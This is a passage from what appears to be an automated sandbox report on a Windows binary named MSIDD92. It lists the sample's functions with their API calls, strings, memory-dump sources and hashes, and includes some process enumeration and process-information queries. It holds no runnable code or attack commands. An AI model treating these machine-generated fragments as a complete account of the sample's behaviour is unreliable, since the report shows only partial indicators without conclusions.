                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead$ErrorFreeLast$AddressDirectoryLibraryLocalProcSystem
                                                                      • String ID: NtQueryInformationProcess
                                                                      • API String ID: 253270903-2781105232
                                                                      • Opcode ID: 3f9d12185af7e02b5d95d4abc29c1e8291cfa18127a54cb7077edb6c12b6e231
                                                                      • Instruction ID: 83d0d0e63580b0007d37b1d87bafa2db9154ccb87b8078f3ae480536c4f0a3e1
                                                                      • Opcode Fuzzy Hash: 3f9d12185af7e02b5d95d4abc29c1e8291cfa18127a54cb7077edb6c12b6e231
                                                                      • Instruction Fuzzy Hash: 60B17F70D10749DADB20CF64C9487AEBBF0EF48308F14465EE449A7690E7B5A6C8CBA1
                                                                      Function 00D8D491 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00D8D498
                                                                      • _Maklocstr.LIBCPMT ref: 00D8D501
                                                                      • _Maklocstr.LIBCPMT ref: 00D8D513
                                                                      • _Maklocchr.LIBCPMT ref: 00D8D52B
                                                                      • _Maklocchr.LIBCPMT ref: 00D8D53B
                                                                      • _Getvals.LIBCPMT ref: 00D8D55D
                                                                        • Part of subcall function 00D8708B: _Maklocchr.LIBCPMT ref: 00D870BA
                                                                        • Part of subcall function 00D8708B: _Maklocchr.LIBCPMT ref: 00D870D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                      • String ID: false$true
                                                                      • API String ID: 3549167292-2658103896
                                                                      • Opcode ID: 20a7b2ee7f57c57d7d0b8657d10bfe86b1921a87c01123e538fbe72002c9f9b2
                                                                      • Instruction ID: f2463cf216cb4d818793f1c8913c3c98a54c4adc07fb4fee01f0ae5b58096296
                                                                      • Opcode Fuzzy Hash: 20a7b2ee7f57c57d7d0b8657d10bfe86b1921a87c01123e538fbe72002c9f9b2
                                                                      • Instruction Fuzzy Hash: C4216D71D00308AADF14FFA5D886B9E7BA8EF05710F10805AF9199F282EA70D504CBB1
                                                                      Function 00D7C9C0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 480COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00D85C66: __EH_prolog3.LIBCMT ref: 00D85C6D
                                                                        • Part of subcall function 00D85C66: std::_Lockit::_Lockit.LIBCPMT ref: 00D85C78
                                                                        • Part of subcall function 00D85C66: std::locale::_Setgloballocale.LIBCPMT ref: 00D85C93
                                                                        • Part of subcall function 00D85C66: std::_Lockit::~_Lockit.LIBCPMT ref: 00D85CE6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7CA1A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7CA80
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7CB4F
                                                                        • Part of subcall function 00D845A7: __EH_prolog3.LIBCMT ref: 00D845AE
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7CC00
                                                                      • LocalFree.KERNEL32(?,?,?,00DCB6C9,00000000,00DCB6C9), ref: 00D7CD01
                                                                      • __cftoe.LIBCMT ref: 00D7CE5E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2085124900-1405518554
                                                                      • Opcode ID: 90187ab0d76e1251fe56d4916511727d68b20632b5df9c63155d3cc66f17244c
                                                                      • Instruction ID: 0fb0c04bf4667ebaaa121ecdd1af5ae49573e3be0176c05ff926bdd2a674490f
                                                                      • Opcode Fuzzy Hash: 90187ab0d76e1251fe56d4916511727d68b20632b5df9c63155d3cc66f17244c
                                                                      • Instruction Fuzzy Hash: 69128F71D11249DFDF11DFA8C845BAEBBB5EF08304F148169E859AB381E735AA04CBB1
                                                                      Function 00D9B22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • type_info::operator==.LIBVCRUNTIME ref: 00D9B34B
                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00D9B459
                                                                      • _UnwindNestedFrames.LIBCMT ref: 00D9B5AB
                                                                      • CallUnexpected.LIBVCRUNTIME ref: 00D9B5C6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 2751267872-393685449
                                                                      • Opcode ID: 69be702098d262fbab758152961f0e4cefc474c2fd4587d0008e3ec4ff0497a9
                                                                      • Instruction ID: 61c5bd4a7c25b5d072be6f836e4feac199cfe1c6b969e5b2ef6c3543f27f2b67
                                                                      • Opcode Fuzzy Hash: 69be702098d262fbab758152961f0e4cefc474c2fd4587d0008e3ec4ff0497a9
                                                                      • Instruction Fuzzy Hash: 9CB16A71900209EFCF15EFA4EA819AEBBB5FF14324B1A415AE8056B212D731DE51CBB1
                                                                      Function 00D80260 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 269memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00D80322
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00D80367
                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00D803DE
                                                                      • LocalFree.KERNEL32(?), ref: 00D8041B
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,862265DA,862265DA,?,?), ref: 00D80546
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree$___std_exception_copy
                                                                      • String ID: ios_base::failbit set$iostream
                                                                      • API String ID: 2276494016-302468714
                                                                      • Opcode ID: e804431e711cf1c6927980130e729de54aab70c94a64aeb4d2f0aa3f8d681c15
                                                                      • Instruction ID: 4162e3ba8029961d70e158d31d61a9463975d3b82439c250fd5abf29fbf3821e
                                                                      • Opcode Fuzzy Hash: e804431e711cf1c6927980130e729de54aab70c94a64aeb4d2f0aa3f8d681c15
                                                                      • Instruction Fuzzy Hash: 28A180B1D01208DFDB18DF68D885BAEBBB5FB49310F14826DE815AB391DB709944CBB1
                                                                      Function 00D72BD0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • #224.MSI(?,00000001,00000000,00000000,00000000), ref: 00D72C43
                                                                      • LocalFree.KERNEL32(?), ref: 00D72CA2
                                                                      • LocalFree.KERNEL32(?), ref: 00D72D0C
                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 00D72E94
                                                                        • Part of subcall function 00D73D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00D73DA3
                                                                      • LocalFree.KERNEL32(?), ref: 00D72E13
                                                                      • LocalFree.KERNEL32(?), ref: 00D72E6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Local$Cert$#224CertificateContextNameString
                                                                      • String ID: Jm
                                                                      • API String ID: 2665452496-1413287597
                                                                      • Opcode ID: 4e5d9835ad9a03455521b2d117fb46a902be635c9c477bb5ad7e541b394e513a
                                                                      • Instruction ID: 4c7fa3a27bf8b1fd62eea0274f015b844d81539b51087cac5a469fb333673384
                                                                      • Opcode Fuzzy Hash: 4e5d9835ad9a03455521b2d117fb46a902be635c9c477bb5ad7e541b394e513a
                                                                      • Instruction Fuzzy Hash: C6917070910389CFDB18CFA8C558BAEBBB5FF44304F14861DE459AB391E775AA84CB60
                                                                      Function 00D7BA30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000044,862265DA,?,00000000), ref: 00D7BA8B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7BAC8
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7BB35
                                                                      • __Getctype.LIBCPMT ref: 00D7BB7E
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7BBF2
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7BCAF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3635123611-1405518554
                                                                      • Opcode ID: 6428b367fc4568771c2b0a2dc7fd38fd0bfbd26f81f4f6b60cc75eb8f617a913
                                                                      • Instruction ID: 2988cd4f57646db7a061d680e49fc6351f6739aa0661c35951f3fb0773b081ac
                                                                      • Opcode Fuzzy Hash: 6428b367fc4568771c2b0a2dc7fd38fd0bfbd26f81f4f6b60cc75eb8f617a913
                                                                      • Instruction Fuzzy Hash: DA8161B0D04348DFEB21DFA8C94579EBBF4AF14314F28819AD448AB381EB759A44DB71
                                                                      Function 00D7C220 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000018,862265DA,?,00000000,?,?,?,?,?,?,?,00000000,00DBABC5,000000FF), ref: 00D7C264
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7C29E
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7C302
                                                                      • __Getctype.LIBCPMT ref: 00D7C34B
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7C391
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7C445
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3635123611-1405518554
                                                                      • Opcode ID: c21ccfd5a42a5754664c889d5dd11ddfce89263698bed981802a2c5efd3c7ecc
                                                                      • Instruction ID: ae5bc39545fd7dfda0b967c79e139f09f51c5a8b9740f25ff0345c927819d942
                                                                      • Opcode Fuzzy Hash: c21ccfd5a42a5754664c889d5dd11ddfce89263698bed981802a2c5efd3c7ecc
                                                                      • Instruction Fuzzy Hash: 03615BB0D11288EEEB10DFE8C9047DEBBF4AF14314F288159E454AB381E7B59A08CB71
                                                                      Function 00D9743E Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00D974C9
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D97557
                                                                      • __alloca_probe_16.LIBCMT ref: 00D97581
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D975C9
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D975E3
                                                                      • __alloca_probe_16.LIBCMT ref: 00D97609
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D97646
                                                                      • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00D97663
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                      • String ID:
                                                                      • API String ID: 3603178046-0
                                                                      • Opcode ID: b07ab253997e56cdf93f1f6e200d86389e9074e00047db783f868347f11db7b4
                                                                      • Instruction ID: 9d00ffc7251642045c36149339b42c917c417d14f2b4e9203ef9cb7d75abb68c
                                                                      • Opcode Fuzzy Hash: b07ab253997e56cdf93f1f6e200d86389e9074e00047db783f868347f11db7b4
                                                                      • Instruction Fuzzy Hash: A471A372A2864A9FDFA18FA8CC45AEE7FB6EF49354F190015E945E7251EB35C800CB70
                                                                      Function 00D96F23 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00D7C6DF,?,00000001,00000000,?,00000000,?,00D7C6DF,?), ref: 00D96F6C
                                                                      • __alloca_probe_16.LIBCMT ref: 00D96F98
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F,?), ref: 00D96FD7
                                                                      • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F), ref: 00D96FF4
                                                                      • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F), ref: 00D97033
                                                                      • __alloca_probe_16.LIBCMT ref: 00D97050
                                                                      • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F), ref: 00D97092
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00D7C6DF,?,?,00000000,00D7CCD3,0000003F,?), ref: 00D970B5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                      • String ID:
                                                                      • API String ID: 2040435927-0
                                                                      • Opcode ID: e7e3206638998a08ceeaa09c244de8695aa11104ac8ee67a11551aa57a0c3d2f
                                                                      • Instruction ID: d9543088fa9f2f47ad0dc6ba87afd9c65b55c4809e307fcf3dff4754fdcd4aae
                                                                      • Opcode Fuzzy Hash: e7e3206638998a08ceeaa09c244de8695aa11104ac8ee67a11551aa57a0c3d2f
                                                                      • Instruction Fuzzy Hash: F8515C7252430AEBEF209F64DC45FAA7BBAEF44790F194125F909E6190EB35D9108B70
                                                                      Function 00D75940 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 389fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTempFileNameW.KERNEL32(?,URL,00000000,?,862265DA,?,00000004), ref: 00D759AA
                                                                      • LocalFree.KERNEL32(?), ref: 00D75ABB
                                                                      • MoveFileW.KERNEL32(?,00000000), ref: 00D75D5B
                                                                      • DeleteFileW.KERNEL32(?), ref: 00D75DA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: File$DeleteFreeLocalMoveNameTemp
                                                                      • String ID: URL$url
                                                                      • API String ID: 1622375482-346267919
                                                                      • Opcode ID: 012885feb7813fff7e3ead6fb98e40bb554911cb4cbbea6876193a746e2e45e6
                                                                      • Instruction ID: 32a4770b7ff2085ac07e5b72c5c18d8d11ebdc1df4f028b92ebc58844342cf47
                                                                      • Opcode Fuzzy Hash: 012885feb7813fff7e3ead6fb98e40bb554911cb4cbbea6876193a746e2e45e6
                                                                      • Instruction Fuzzy Hash: C0024970A14669CACB24DF28CD98B9DB7B5FF54304F1082D9D409A7251EBB4ABC4CFA1
                                                                      Function 00D761D0 Relevance: 10.7, APIs: 7, Instructions: 234processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D76242
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D76285
                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00D762E1
                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00D762FD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D76445
                                                                      • Process32NextW.KERNEL32(?,0000022C), ref: 00D76463
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D7648E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 708755948-0
                                                                      • Opcode ID: 189a0982cb23b99e43078d21f0d5152c778d416acf28a9d3b25245a07b8947af
                                                                      • Instruction ID: 5c1b763420ff973b84c70f217446ac42cb62972129e3ac05fd3e39e72523a72a
                                                                      • Opcode Fuzzy Hash: 189a0982cb23b99e43078d21f0d5152c778d416acf28a9d3b25245a07b8947af
                                                                      • Instruction Fuzzy Hash: 67A16B70906669DFDB20DF64C948BDEBBB4EF44704F1482D9E41DA7280E7B49A84CFA0
                                                                      Function 00D7F5E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 189memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,0000000C,862265DA,?,00000000,00000000,?,?,?,?,00000000,00DBB2D1,000000FF,?,00D7EBCA,00000000), ref: 00D7F624
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7F65A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7F6BE
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7F77E
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7F832
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2968629171-1405518554
                                                                      • Opcode ID: e7e9622045591dd93beab004ad2e25a5e6d7d48dffe9e8a1d88026c06b912325
                                                                      • Instruction ID: 496441ff4f933a6aff642d19e1663a37154e443425218b9020ab479bc58436d3
                                                                      • Opcode Fuzzy Hash: e7e9622045591dd93beab004ad2e25a5e6d7d48dffe9e8a1d88026c06b912325
                                                                      • Instruction Fuzzy Hash: 8A7161B0D01349EAEF21DFA8C9457DEBFB4AF15314F188169E414A7381E7B59A04C7B2
                                                                      Function 00D7F3B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000008,862265DA,?,00000000,00000000,?,?,?,00000000,00DBB1DD,000000FF,?,00D7ED0A,00000000,?), ref: 00D7F3F4
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00D7F42A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00D7F48E
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00D7F4FE
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00D7F5B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2968629171-1405518554
                                                                      • Opcode ID: c6a7cf2dd53ae4b0de942658ab9aea831715612bf20aaef37bb749c5befc8445
                                                                      • Instruction ID: 6a210be46da8c6163b9ae1b2f0c8b4156ff37cf66e208676c0c17b713b2e418d
                                                                      • Opcode Fuzzy Hash: c6a7cf2dd53ae4b0de942658ab9aea831715612bf20aaef37bb749c5befc8445
                                                                      • Instruction Fuzzy Hash: CF616EB0D01389EBEF21DFA8D9447DEBBB4AF14314F288169E454AB381E7759A04CB71
                                                                      Function 00D98D30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D98D67
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00D98D6F
